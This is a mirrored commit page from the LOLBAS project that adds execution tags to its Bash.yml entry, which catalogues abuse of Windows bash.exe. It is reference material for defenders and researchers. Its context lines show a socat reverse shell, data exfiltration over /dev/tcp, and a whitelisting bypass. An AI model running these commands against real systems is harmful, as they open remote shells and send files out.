mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-11-04 10:39:56 +01:00 
			
		
		
		
	Update Bash.yml
Added tags: - Execute: CMD - Input: Custom format
This commit is contained in:
		@@ -11,6 +11,9 @@ Commands:
 | 
			
		||||
    Privileges: User
 | 
			
		||||
    MitreID: T1202
 | 
			
		||||
    OperatingSystem: Windows 10
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: CMD
 | 
			
		||||
      - Input: Custom Format
 | 
			
		||||
  - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
 | 
			
		||||
    Description: Executes a reverseshell
 | 
			
		||||
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
 | 
			
		||||
@@ -18,6 +21,9 @@ Commands:
 | 
			
		||||
    Privileges: User
 | 
			
		||||
    MitreID: T1202
 | 
			
		||||
    OperatingSystem: Windows 10
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: CMD
 | 
			
		||||
      - Input: Custom Format
 | 
			
		||||
  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
 | 
			
		||||
    Description: Exfiltrate data
 | 
			
		||||
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
 | 
			
		||||
@@ -25,6 +31,9 @@ Commands:
 | 
			
		||||
    Privileges: User
 | 
			
		||||
    MitreID: T1202
 | 
			
		||||
    OperatingSystem: Windows 10
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: CMD
 | 
			
		||||
      - Input: Custom Format
 | 
			
		||||
  - Command: bash.exe -c calc.exe
 | 
			
		||||
    Description: Executes calc.exe from bash.exe
 | 
			
		||||
    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
 | 
			
		||||
@@ -32,6 +41,9 @@ Commands:
 | 
			
		||||
    Privileges: User
 | 
			
		||||
    MitreID: T1202
 | 
			
		||||
    OperatingSystem: Windows 10
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: CMD
 | 
			
		||||
      - Input: Custom Format
 | 
			
		||||
Full_Path:
 | 
			
		||||
  - Path: C:\Windows\System32\bash.exe
 | 
			
		||||
  - Path: C:\Windows\SysWOW64\bash.exe
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user